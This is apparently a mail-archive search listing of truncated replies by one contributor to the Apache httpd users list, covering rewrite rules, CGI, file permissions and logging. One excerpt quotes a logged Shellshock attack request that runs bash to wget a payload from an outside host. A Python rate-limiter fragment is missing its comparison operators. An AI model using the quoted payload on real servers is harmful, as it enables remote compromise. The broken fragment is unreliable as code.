requests when invoked via the CGI protocol.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
don't use shell scripts (that is, a program written
in sh/bash/ksh/zsh or similar languages that adhere to the POSIX 1003 shell
standard). That can only lead to much wasted time, bugs, and security
holes. Yes, it is technically possible to handle a HTTP POST request using
such a shell.
at has bound to port 80. Run
that now so you learn what to look for. Find the line that contains ":80"
in the local address column and "LISTEN" in the state column. Next to that
will be the PID and process name.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
that address three days ago and
automatically blacklisted by my firewall because the HTTP request specified
an invalid HTTP "Host:" header.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
mand. Easiest way is via mod_allowmethods:
https://httpd.apache.org/docs/2.4/mod/mod_allowmethods.html
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
tory. But that is moot
given that you already had to grant the web server access to your home
directory in order to support your requirements. The concern now is whether
user accounts on your machine other than the one running the apache web
server can exploit those looser permissions.
's a potential information leak that could
theoretically be used to launch an attack. Whether that's a concern for you
depends on a lot of factors.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
either the public execute bit is not set, or
the group execute but is not set or if set apache is not a member of that
group, or the user execute bit is not set or if set apache is not running
as that user.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
; solution on several forums before.
>
> I doubt whether Perdition can help me out on my current test ?
>
>
What is the relevance of the Perdition mail proxy to your current problem?
It seems to me to that you don't understand the difference between the SMTP
and HTTPD protocols. Which i
.wikipedia.org/wiki/Squid_(software).
> I expect keeping the Host clean for running VirtualBox ONLY.
>
Then you need another system that handles all traffic to/from your single
fixed/static IP address on which you can run a "reverse proxy" and forwards
traffic to the ap
the CHANGES file might be relevant:
Changes with Apache 2.4.2
*) SECURITY: CVE-2012-0883 (cve.mitre.org)
envvars: Fix insecure handling of LD_LIBRARY_PATH that could lead to
the
current working directory to be searched for DSOs. [Stefan Fritsch]
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
rg
with description of your problem. Include any relevant configuration
options, error messages, and how to reproduce the problem.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
e original question
about configurable values for ServerLimit, ThreadsPerChild, etc.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ctories. However, you clearly have other
customizations in place since "which httpd" would not normally show the
output you reported. So it's possible your $PATH also contains atypical
entries that may cause httpd 2.2 to be found first even after you run "brew
link".
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
I tested this on my system. The value logged by %L in the access log
cannot be found in the error log. The %L value is clearly a hash of some
sort (e.g., SHA1 value of the incoming IP address and port) converted to
ASCII. This looks like a bug to me.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
null)
bytes. So if you want to capture binary data you'll want to use the fixed
version I attached to this problem report:
https://bz.apache.org/bugzilla/show_bug.cgi?id=57045
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ectory listings do
not normally involve mmap'ing static files. So I suspect there is something
unusual about your apache config that worked fine, possibly by accident,
under version 2.2 and results in incorrect output under version 2.4. Are
you using any third-party modules? Can you employ a "divide and
It seems to me you're confusing a guideline (e.g., minimize the
number of processes per container) for a mandate (e.g., have only one
process per container).
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ll do
> that.
>
Works for me. Let us know if it doesn't work for you.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ng a script or a binary. If you choose to invoke the
httpd binary directly without the aid of a wrapper script it simply becomes
your responsibility to pass all necessary and appropriate arguments; e.g.,
-f to specify where the config file can be found.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
." (dot or "source") command before invoking the httpd binary.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
to recognizing
and dispatching incoming requests as well as dealing with housekeeping
chores may mandate one or more processes or threads for activities other
than handling a HTTP request.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
On Sat, Oct 24, 2015 at 11:31 PM, Nick Kew <n...@webthing.com> wrote:
> On Sat, 2015-10-24 at 21:11 -0700, Kurtis Rader wrote:
> > I'm going to assume that by "single process" you meant "single user".
>
> If you read the docs, you'll find single proce
how to configure a Docker container to
die if the Apache HTTP server dies. Nor how to start an Apache HTTP server
daemon and have its output written to stdout and stderr in a manner that
can be collected by whatever software monitors the output of a Docker
virtual machine.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
@updates
> libreport-plugin-kerneloops.x86_64 2.6.2-4.fc22 @updates
> [root@casablanca ~]#
>
> Here, the kernel 4.2.3-200.fc22 is installed and the machine according to
> uname -r booted from it.
>
> -
>
> Does the BIOS boot partition make the difference? Can anybody explain
> this strange behaviour?
>
> Thanks for your attention.
>
> suomi
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
on directory for all the files you
need is root ("/").
P.S., There are very fringe, unusual, computers that directly execute byte
code for languages like Forth and Java rather than machine language as
typically understood by most CPUs. But even those systems are effectively
executing binaries.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
On Fri, Oct 16, 2015 at 6:23 PM, Good Guy <xfs...@hotmail.com> wrote:
> On 17/10/2015 01:41, Kurtis Rader wrote:
>
>>
>> That is not correct, Good Guy. Linux, and pretty much any operating
>> system, uses binary programs. Which means programs that consist of
tion is to compile it from source with whatever options meet
your requirements. For example, the install dir might be
/usr/local/apache24_testing or some such that exists on both of your
systems. Building from source on Linux is trivial (unlike on MS Windows).
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ons.
>
The [OR] on the second RewriteCond does nothing since it isn't followed by
another RewriteCond. You also don't need the first RewriteCond since by
definition an empty HTTP_REFERER won't match pattern.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ile /data/apache/patch2.2/lib/libaprutil-1.so exist? Do the other
share object pathnames exist? If they exist run the "file" command against
them and the httpd binary. Are they all the same architecture? Especially,
are they all 32 or 64 bit binaries? If they're 64-bit binaries does the
system you're trying to run them on support 64-bit binaries?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
r how can
>
> carry data like ap_table with key value between modules. is it possible?
> Thanks.
>
You are unlikely to get an answer on this mailing list. Even though
developers (like myself) read this mailing list it isn't the correct forum
for such questions. Check out the "Third-Party Mo
obviously wrong with what you showed
us other than you probably should be using %{HTTP_HOST} and the RewriteRule
statement is needlessly complicated (but then so are most of the examples I
saw from the google search recommended).
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
r "setfib invalid fib"
yields a bunch of results that suggest your running apache on FreeBSD.
Further, the setfib command runs a program with a specific routing table.
Presumably this has something to do with IP firewalls on FreeBSD. So asking
this question on a FreeBSD mailing list or forum is
; *The main thing here is Apache http server is on Windo**ws machine.*
>
If you are trying to use a module that is not part of the core Apache HTTP
server and which is only available on MS Windows you should ask for help on
whatever mailing list or web site is devoted to supporting that module.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
Explorer only. Is that true?
>
> Please help me out here. This is very crucial for my project and deadline
> is already passed. :(
>
> Please let me know in case of any other queries.
>
> Thanks & Regards,
> *Ashish Mistry*
>
> --
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
>
The common log format (CLF), which is the default, leaves a lot to be
desired. I highly recommend using a CustomLog format that includes, at a
minimum, "%{Host}i" so that the client provided HTTP host header is part of
the lo
r
only provides static content. A lower value (in the single digits) might,
if you're lucky, mitigate a DDOS attack enough to keep your server from
melting down.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
com> works fine and goes to the
> correct site.
>
> example.com does not work and gets into a redirect loop.
>
> What do I need to configure to get example.com to work ?
>
> Thanks,
>
> Warren Bell
>
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
experiment at a time; i.e., issuing one client request then saving the log
files for analysis. If you do not minimize the number of variables (e.g.,
the number of unrelated HTTP requests) it can be very difficult to derive
any conclusions from the data.
--
Kurtis Rader
Caretaker of the exceptional
please say so.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
I then issue a series of carefully constructed HTTP requests meant to
eliminate irrelevant details and examine the error log for clues.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
is not clear from your description.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
by the remote IP address is shown as
localhost:80? Shown where? By what program?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
project adheres to that rule.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
#documentroot ) doesn't even
mention the corresponding env var. I think that's a documentation bug.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
about what is passed to the subprocess. I
would open a second issue asking that the documentation make it clear when
directives like DocumentRoot have the side effect of setting an environment
variable.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
links to
the official specification at http://www.ietf.org/rfc/rfc3875.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
fault.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
should get a permission denied error.
As user1 restore the x permission and remove the r permission from the
directory:
chmod 511 /test
As user2 repeat the ls command:
ls -l /test/file
It should work this time.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
krader_custom
ErrorLog |/usr/sbin/rotatelogs -c -f -l -L
/private/var/log/apache2/test-error.log
/private/var/log/apache2/test-error.log.%Y-%m-%d 86400
Obviously you'll want to substitute another program for
/usr/sbin/rotatelogs in the example above that writes the data where you
want it to go.
--
Kurtis
to
stackoverflow, and the best idea given was creating a symlink in the
container. Is there a way to do this officially?
http://stackoverflow.com/posts/32013582
FYI, That URL isn't valid; it results in a page not found error from
Stack Overflow.
--
Kurtis Rader
Caretaker of the exceptional canines
up to this point have had fairly obvious
answers and didn't require actual knowledge of your web server environment
that we could help.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
. Information is passed to
them from the web server via environment variables and, for POST requests,
standard input. You pass arguments to a CGI script via the URI query
string. See https://en.wikipedia.org/wiki/Common_Gateway_Interface
--
Kurtis Rader
Caretaker of the exceptional canines Junior
75.101.21.75 GET / HTTP/1.0 () { :;}; /bin/bash -c \wget -O
/tmp/bbb dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
(e.g., a .htaccess file) all of
the directives are parsed and processed before being applied to the current
request. So, as Zimmi points out, having more than one RewriteEngine
doesn't make any sense. The same is true for RewriteBase.
--
Kurtis Rader
Caretaker of the exceptional canines Junior
=catshowref=books HTTP/1.1 curl/7.37.1
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
which the request
originated. Your error log should include the entire URI, including query
string, sent to your server.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
for short
durations. But for longer term tracking of requests to your server it's
better, and less resource intensive, if you simply define a CustomLog that
includes the %r format string so that the entire URI ends up in the
access log.
--
Kurtis Rader
Caretaker of the exceptional canines Junior
On Sat, Jun 27, 2015 at 1:58 PM, James Moe ji...@sohnen-moe.com wrote:
On 06/27/2015 12:00 PM, Kurtis Rader wrote:
IfModule dumpio_module
I guess this build did not include dumpio_module. Adding the above
produced no additional logging.
Did you add or uncomment the appropriate
probably include your entire .htaccess and
httpd.conf files (stripped of anything sensitive like paths to security
certificates) as attachments.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
remove the Redirect directive?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
requests so that you have total
control over the URI and headers being passed to your server.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
]
If you then issue a GET /category/?testing=123 do you get a 403 Forbidden
status in response?
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
what is happening.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
, your pattern doesn't handle the case where the parameters are
separated by semicolons (which is a legal alternative to ampersand). In
general matching against QUERY_STRING is very difficult to do in a robust
manner.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
On Fri, Jun 26, 2015 at 1:36 PM, Kurtis Rader kra...@skepticism.us wrote:
My question for James would be how do you know the query string has the
parameters in that exact order? Unless the query string has been
hand-crafted you cannot assume the parameters will appear in any specific
order
,
directory, virtual host).
P.S., If you want to match the query string literally rather than as a
pattern which matches a subset of the query string you should preface the
pattern with an equal-sign:
RewriteCond %{QUERY_STRING} =app=ecomns=catshowref=books
--
Kurtis Rader
Caretaker
to remove packages then manually remove any
unexpected files related to those packages that are still in the filesystem
before retrying the install.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
arguments
are parsed. I strongly recommend using only forward slashes in file paths
whenever possible and never mix forward and back slashes as path separators.
P.S., This type of problem is a good example of why you want to avoid
shelling out to an external program whenever possible.
--
Kurtis
timestamp of 786326400, 1994-12-02
00:00:00 local time. I would recommend searching for values in the
range 786297600
+/- n * 3600 for n in -12+12.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
+Cookie+check
```
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
%{QUERY_STRING} !=
RewriteRule ^ %{REQUEST_URI}? [R=302,L]
When I issue a GET /hello.php?whatever=1 with either version I get a 302
response with
Location: http://www.skepticism.us/hello.php
Also, if you don't want to match non-whitespace I recommend \S rather than [^\
].
--
Kurtis Rader
is the wrong place to do it then I would recommend ModSecurity:
http://www.modsecurity.org/.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
* self.ratio
if self.allowance self.rate:
self.allowance = int(self.rate) # throttle
if self.allowance 1.0:
return True
else:
self.allowance -= 1.0
return False
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
. There is probably a GUI (graphical user interface)
means of ascertaining the same data but I have no idea how to do so since I
generally prefer old-school CLI methods.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
76 matches
Mail list logo
